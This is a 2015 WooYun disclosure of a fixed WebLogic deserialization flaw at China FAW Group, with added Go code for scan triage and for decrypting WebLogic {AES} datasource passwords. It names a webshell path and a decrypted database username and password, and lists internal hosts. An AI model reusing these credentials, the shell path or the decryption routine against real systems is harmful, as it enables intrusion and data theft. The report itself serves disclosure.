Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0166279

Title: China FAW Group getshell leaks 208 database tables; a dozen-plus intranet hosts open to further penetration

Vendor: China FAW Group Corporation (中国第一汽车集团公司)

Author: 路人甲

Submitted: 2015-12-31 09:46

Fixed: 2016-01-28 14:13

Published: 2016-01-28 14:13

Vulnerability type: command execution

Severity: high

Self-assessed rank: 20

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)


Vulnerability details

Disclosure status:

2015-12-31: details sent to the vendor, awaiting vendor action
2016-01-04: vendor confirmed; details visible to the vendor only
2016-01-14: details opened to core white hats and domain experts
2016-01-24: details opened to ordinary white hats
2016-01-28: vendor fixed the vulnerability and chose to publish; details public

Brief description:

20 is still worth it!

Detailed description:

http://202.98.11.47:7001/
Deserialization command execution
root privileges

[screenshot: 60.png]


shadow

[screenshot: 62.png]


Scanned the intranet:

http://10.44.30.89 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.35 >> >>nginx >>Success
http://10.44.30.52 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.91 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.51 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.113 >> 一汽解放紧急救援调度系统-管理员登录>>Microsoft-IIS/6.0 >>Success
http://10.44.30.118 >> (page title garbled in extraction) >>null >>Success
http://10.44.30.54 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.90 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.128 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.79 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.156 >> >>Microsoft-IIS/7.5 >>Success
http://10.44.30.76 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.70 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.213 >> >>Microsoft-IIS/6.0 >>Success
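The listing above is raw scanner output in the form "url >> page title >> Server header >> result". The following is an added example, not tooling from the report or its author: it parses that format, drops duplicate hosts, and groups the reachable hosts by banners that were already out of vendor support at the time of the report. The end-of-support dates are public vendor facts (Tomcat 5.5 reached end of life on 2012-09-30; IIS 6.0 ships only with Windows Server 2003, whose extended support ended 2015-07-14), not something the report states; the mojibake title on the .118 host is replaced by a placeholder.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// Host is one line of the report's intranet scan output, which has the shape
// "<url> >> <page title> >> <Server header> >> <result>".
type Host struct {
	URL, Title, Server, Result string
}

// ParseScanLine splits one scan line on the ">>" separator. Blank or
// malformed lines (wrong number of fields) are rejected with ok=false.
func ParseScanLine(line string) (Host, bool) {
	parts := strings.Split(line, ">>")
	if len(parts) != 4 {
		return Host{}, false
	}
	for i := range parts {
		parts[i] = strings.TrimSpace(parts[i])
	}
	return Host{URL: parts[0], Title: parts[1], Server: parts[2], Result: parts[3]}, true
}

// eolProducts maps a banner substring to the date vendor support for that
// product ended. These dates are public vendor facts, not taken from the report.
var eolProducts = map[string]string{
	"Apache Tomcat/5.5": "2012-09-30",
	"Microsoft-IIS/6.0": "2015-07-14",
}

// Triage parses scan output, drops duplicate URLs, and returns, for each
// end-of-life product, the sorted hosts still advertising it. Both the title
// and Server fields are searched because this scanner put the Tomcat version
// in the title column and only the Coyote connector in the Server column.
func Triage(output string) map[string][]string {
	seen := map[string]bool{}
	found := map[string][]string{}
	for _, line := range strings.Split(output, "\n") {
		h, ok := ParseScanLine(line)
		if !ok || seen[h.URL] {
			continue
		}
		seen[h.URL] = true
		banner := h.Title + " " + h.Server
		for product := range eolProducts {
			if strings.Contains(banner, product) {
				found[product] = append(found[product], h.URL)
			}
		}
	}
	for product := range found {
		sort.Strings(found[product])
	}
	return found
}

// CountHosts returns the number of distinct hosts that answered successfully.
func CountHosts(output string) int {
	seen := map[string]bool{}
	for _, line := range strings.Split(output, "\n") {
		if h, ok := ParseScanLine(line); ok && h.Result == "Success" {
			seen[h.URL] = true
		}
	}
	return len(seen)
}

// ScanOutput is the report's own listing; the one mojibake title is replaced.
const ScanOutput = `http://10.44.30.89 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.35 >> >>nginx >>Success
http://10.44.30.52 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.91 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.51 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.113 >> 一汽解放紧急救援调度系统-管理员登录>>Microsoft-IIS/6.0 >>Success
http://10.44.30.118 >> (page title garbled in extraction) >>null >>Success
http://10.44.30.54 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.90 >> Apache Tomcat/5.5.35>>Apache-Coyote/1.1 >>Success
http://10.44.30.128 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.79 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.156 >> >>Microsoft-IIS/7.5 >>Success
http://10.44.30.76 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.70 >> >>Microsoft-IIS/6.0 >>Success
http://10.44.30.213 >> >>Microsoft-IIS/6.0 >>Success`

func main() {
	fmt.Println("reachable hosts:", CountHosts(ScanOutput))
	for product, hosts := range Triage(ScanOutput) {
		fmt.Printf("%s (unsupported since %s): %d hosts %v\n", product, eolProducts[product], len(hosts), hosts)
	}
}
```

On the report's own listing this yields 15 reachable hosts, of which 12 advertise software that was already out of support when the scan was run: three Tomcat 5.5.35 instances and nine IIS 6.0 instances. That is the practical reading of "a dozen-plus machines to go deeper into": the pivot targets are not merely reachable, most of them are unpatchable.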


A dozen-plus intranet machines open to further penetration!
Wrote a shell directly and took over the server:
http://202.98.11.47:7001/uddiexplorer/jmxroot.jsp

[screenshot: 63.png]


Database configuration

<jdbc-driver-params>
<url>jdbc:oracle:thin:@10.44.31.36:1521/orcl</url>
<driver-name>oracle.jdbc.OracleDriver</driver-name>
<properties>
<property>
<name>user</name>
<value>jmt11g</value>
</property>
</properties>
<password-encrypted>{AES}VL8QgmX37Ftk778QCOHcvg4VkiHArfcrx9hYKahpyXQ=</password-encrypted>
</jdbc-driver-params>
<jdbc-connection-pool-params>


Decrypted:
user: jmt11g
password: cdpvrr
208 tables leaked
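The descriptor above stores the database password as a `{AES}` secret. As an added example, not the report's or WebLogic's own code, the block below parses that fragment into host, account and secret, and implements the `{AES}` layout WebLogic uses for descriptor secrets: base64 of a 16-byte IV followed by AES-CBC ciphertext with PKCS#5 padding. What it deliberately does not do is recover the key: that key lives in the domain's SerializedSystemIni.dat, itself wrapped with 3DES under a password-derived key, and obtaining and unwrapping it requires the file-system access the author already had as root. The 16-byte key and IV used here are constructed stand-ins so the round trip can run offline.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/xml"
	"errors"
	"fmt"
	"strings"
)

// jdbcDriverParams mirrors the <jdbc-driver-params> element quoted in the report.
type jdbcDriverParams struct {
	URL        string `xml:"url"`
	DriverName string `xml:"driver-name"`
	Properties []struct {
		Name  string `xml:"name"`
		Value string `xml:"value"`
	} `xml:"properties>property"`
	PasswordEncrypted string `xml:"password-encrypted"`
}

// DataSourceSecret is what a reviewer wants out of the descriptor.
type DataSourceSecret struct {
	Host, User, Encrypted string
}

// ParseDataSource extracts host:port, the account and the encrypted password.
func ParseDataSource(descriptor string) (DataSourceSecret, error) {
	var p jdbcDriverParams
	if err := xml.Unmarshal([]byte(descriptor), &p); err != nil {
		return DataSourceSecret{}, err
	}
	s := DataSourceSecret{Encrypted: p.PasswordEncrypted}
	for _, prop := range p.Properties {
		if prop.Name == "user" {
			s.User = prop.Value
		}
	}
	if at := strings.Index(p.URL, "@"); at >= 0 { // jdbc:oracle:thin:@host:port/service
		s.Host = strings.SplitN(p.URL[at+1:], "/", 2)[0]
	}
	return s, nil
}

// DecryptWebLogicAES reverses the {AES} layout: base64( IV[16] || AES-CBC(key,
// PKCS#5-padded plaintext) ). key is the domain's data-source AES key from
// SerializedSystemIni.dat; unwrapping it from that file is not implemented here.
func DecryptWebLogicAES(key []byte, secret string) (string, error) {
	const prefix = "{AES}"
	if !strings.HasPrefix(secret, prefix) {
		return "", errors.New("not an {AES} secret")
	}
	raw, err := base64.StdEncoding.DecodeString(secret[len(prefix):])
	if err != nil {
		return "", err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return "", errors.New("expected a 16-byte IV followed by whole blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	// Strict PKCS#5 unpadding: a wrong key almost always fails here instead of
	// silently returning garbage.
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad padding (wrong key?)")
	}
	return string(pt[:len(pt)-n]), nil
}

// EncryptWebLogicAES builds a secret in the same layout so the decoder can be
// exercised offline; the caller supplies the IV so results are reproducible.
func EncryptWebLogicAES(key, iv []byte, plaintext string) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(iv) != aes.BlockSize {
		return "", errors.New("need a valid AES key and a 16-byte IV")
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append([]byte(plaintext), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return "{AES}" + base64.StdEncoding.EncodeToString(append(append([]byte{}, iv...), ct...)), nil
}

// Descriptor is the report's own data-source fragment, closed so that it parses.
const Descriptor = `<jdbc-driver-params>
<url>jdbc:oracle:thin:@10.44.31.36:1521/orcl</url>
<driver-name>oracle.jdbc.OracleDriver</driver-name>
<properties><property><name>user</name><value>jmt11g</value></property></properties>
<password-encrypted>{AES}VL8QgmX37Ftk778QCOHcvg4VkiHArfcrx9hYKahpyXQ=</password-encrypted>
</jdbc-driver-params>`

func main() {
	s, _ := ParseDataSource(Descriptor)
	fmt.Printf("db=%s user=%s secret=%s\n", s.Host, s.User, s.Encrypted)
	// Round trip under a throwaway key; the real key must come from the host.
	key, iv := []byte("0123456789abcdef"), []byte("fedcba9876543210")
	enc, _ := EncryptWebLogicAES(key, iv, "cdpvrr")
	fmt.Println(DecryptWebLogicAES(key, enc))
}
```

A quick sanity check that this is the right layout: the 44 base64 characters in the report's secret decode to 32 bytes, a 16-byte IV plus exactly one cipher block, which is what a six-character password padded to 16 bytes produces. The defensive lesson is the same one that got the author 208 tables: a `{AES}` value in config.xml or a datasource descriptor is only as secret as SerializedSystemIni.dat, so anyone with read access to the domain directory (here, root via deserialization) holds every database credential the domain uses.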

[screenshot: 64.png]


All database tables

TABLE_NAME (VARCHAR2)
CDP_SENDGOODS_BAK
CDP_SENDGOODSDETAIL_BAK
SMP_INV_OUTBILL_DETAILS_H0924
SMP_INV_OUTBILL_0924
SMP_INV_INBILL_H_0924
SMP_INV_INBILL_DETAILS_H_0924
SMP_INV_INVENTORY_0924
ERS_DBM_INVLOCATION_BAK
CDP_ABNORMAL
CDP_BOX
CDP_BOXDETAIL
CDP_BOXSEQ
CDP_CAMTESTD
CDP_CAMTESTM
CDP_INFOCOLLECTNO
CDP_ORDER
CDP_ORDERDETAIL
CDP_SENDGOODS
CDP_SENDGOODSDETAIL
CDP_SPARETEST
CPTEST
ERS_DBM_INVLOCATION
ERS_DBM_ITEMMASTER
ERS_DBM_ITEMTYPE
ERS_DBM_MANUCENTER
ERS_DBM_MOVETYPE
ERS_DBM_MTYPEANDUCASE
ERS_DBM_PERIOD
ERS_DBM_PROCESS
ERS_DBM_PRODUCTCLASS
ERS_DBM_PROTOUR
ERS_DBM_UNITS
ERS_DBM_WAREHOUSE
ERS_DBM_WHOUSEAGE
ERS_DBM_WHOUSEITYPE
ERS_DBM_WHOUSEUSER
ERS_DBM_WORKSTATION
ERS_INV_INBILL
ERS_INV_INBILLDETAIL
CDP_INBILLSCANRECD_INSERT
CDP_INBILLSCANRECD_BAK
JYTEST
CDP_INSPECTBILL
CDP_INSPECTBILLD
T_SYS_SEARCHHELP
T_SYS_SEARCHHELP_PARAM
T_SYS_USER
T_SYS_USER_ROLE
SMP_INV_OUTBILL_DETAILSBAK
CDP_IO_CDPTODRBS
CDP_INBILLSCANRECD
DRBS_CARNETMSG
DRBS_FIRMWAREANDTER
DRBS_IO_CDPTODRBS
DRBS_IO_CERTIFICATE
DRBS_IO_TDSTODRBS
DRBS_IO_TDSTODRBS_H
DRBS_OPERATORRANGE
DRBS_SALEANDOPERATOR
DRBS_TERFIRMWAREVER
DRBS_TERMESSAGE
T_SYS_ADMINDIVISION
T_SYS_BROWSELOG
T_SYS_COMPANY
T_SYS_LOOKUP
T_SYS_LOOKUP_DETAIL
T_SYS_MENU
T_SYS_MESSAGE
T_SYS_ORGANIZATION
T_SYS_PARAMETER
T_SYS_PERM
T_SYS_ROLE
T_SYS_ROLE_PERM
SMP_INV_SEQUENCE_INOUT_BAK
SMP_INV_SEQUENCE_DETAILS_BAK
ERS_INV_INVENTORY
ERS_INV_ITEMSEQUENCE
ERS_INV_LOCINVENTORY
ERS_INV_OUTBILL
ERS_INV_OUTBILLDETAIL
ERS_INV_SUMSEQUENCE
ERS_PUR_REGISTER
ERS_PUR_REGISTERDETAIL
ERS_QMS_FINISHCHECKBILL
ERS_SYS_AREA
ERS_SYS_BILL_SN
ERS_SYS_BILL_SN_DAYNO
ERS_SYS_BILL_SN_DEF
ERS_SYS_BLOBS
ERS_SYS_CITYS
ERS_SYS_COM
ERS_SYS_CUSTOM_QUERY
ERS_SYS_CUSTOM_QUERY_PARA
ERS_SYS_CUSTOM_QUERY_U_MODEL
ERS_SYS_CUSTOM_QUERY_U_RIGHT
ERS_SYS_DELCHECK
ERS_SYS_DEPARTMENT
ERS_SYS_LOGINS
ERS_SYS_LOOKUP_TYPES
ERS_SYS_LOOKUP_VALUES
ERS_SYS_MENUS
ERS_SYS_MESSAGE
ERS_SYS_PARAMETERS
ERS_SYS_PERIOD
ERS_SYS_PERMS
ERS_SYS_PROVINCES
ERS_SYS_ROLES
ERS_SYS_ROLE_PERMS
ERS_SYS_USERS
ERS_SYS_USERS_BACK
ERS_SYS_USERWAREHOUSE
ERS_SYS_USER_ROLES
ERS_SYS_WAREHOUSE
PRODUCTS_BASE
PRODUCT_CATEGORIES_BASE
PS_TXN
SMP_ADM_GOVCAR
SMP_ADM_TRIP
SMP_ADM_VOCATION
SMP_CAMASSIGN
SMP_CAMASSIGN_DETAIL
SMP_CAMCAR
SMP_CAMCARSON
SMP_CAMCAR_HISTORY
SMP_CAMCHARGESNOTREG
SMP_CAMCHARGESNOTREG_DETAIL
SMP_CAMCHARGESREGISTRATION
SMP_CAMCHARGESREG_DETAIL
SMP_CAMINSTALLBILL
SMP_CAMINSTALLBILLSON
SMP_CAMINSTALLBILL_H
SMP_CAMINSTALLMAINTNOTES
SMP_CAMSEALPASTE
SMP_CAMSEALPASTE_DETAIL
SMP_CAMSERVICEMAIN
SMP_CAMSERVICESON
SMP_CAMSEVICEREGMAIN
SMP_CAMSEVICEREGSON
SMP_CAMSHIFTRECORDS
SMP_CAMTELRECORD
SMP_CAMTEST
SMP_CAMTEST_H
SMP_CAMWAGONFACTORY
SMP_CAMWARRANTYPARS
SMP_CERTIFICATE
SMP_DBM_ASSEMBLYBILL
SMP_DBM_CAMCARCOLOR
SMP_DBM_CAMCARUSE
SMP_DBM_CAMCOMPANY
SMP_DBM_CUSTOMER
SMP_DBM_INSTALLPERSON
SMP_DBM_ITEMMASTER
SMP_DBM_ITEMQUOTA
SMP_DBM_PURCHASE
SMP_DBM_SUPPLIER
SMP_DBM_UPDATECARLOG
SMP_DBM_VERSION
SMP_DMP_ASSEMBLYTESTPRO
SMP_DMP_FAKEPOSITIONSTRATEGY
SMP_DMP_POSITIONSTRATEGY
SMP_FAKE_ITEMMASTER
SMP_FETCHBILLMAIN
SMP_FETCHBILLSON
SMP_INV_COLLARBILL_DETAILS
SMP_INV_COLLARUSEBILL
SMP_INV_INBILL
SMP_INV_INBILL_DETAILS
SMP_INV_INBILL_DETAILS_H
SMP_INV_INBILL_H
SMP_INV_INOUTBILLNO
SMP_INV_INVENTORY
SMP_INV_INVENTORY_H
SMP_INV_OUTBILL
SMP_INV_OUTBILL_DETAILS
SMP_INV_OUTBILL_DETAILS_H
SMP_INV_OUTBILL_H
SMP_INV_SEQUENCE_DETAILS
SMP_INV_SEQUENCE_INOUT
SMP_INV_SEQUENCE_INOUT_H
SMP_INV_SEQUENCE_INOUT_TEMP
SMP_INV_SIMATTRIBUTES
SMP_INV_SIMCOSTD
SMP_INV_SIMPRINT
SUPPLIERS
TEMP_ITEMMASTER
TESTDATE
T_SYS_DELCHECK
T_SYS_WORKFLOW
YFYS_DEPT
YFYS_PROJECT
CDP_JFWAREHOUSE
ERS_SYS_MESSAGE59
CDP_IO_CDPTODRBS_H
ERS_DBM_INVLOCATION_BAK1
CDP_INBILLSCANREC
YU_ABC
TEMP_USABLEQUA
TEMP_OUTBILL_D
TEMP_OUTBILL
TEMP_KQOUTBILL_D
TEMP_KQOUTBILL
TEMP_KQINBILL_D
TEMP_KQINBILL
TEMP_INVQUA
TEMP_INVENTORY
TEMP_INBILL_D
TEMP_INBILL
TEMP1

Proof of vulnerability:

Fix recommendation:

Asking for 20 rank!

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: high

Vulnerability rank: 20

Confirmed: 2016-01-04 10:43

Vendor reply:

Submitted to the relevant department for handling

Latest status:

2016-01-28: fixed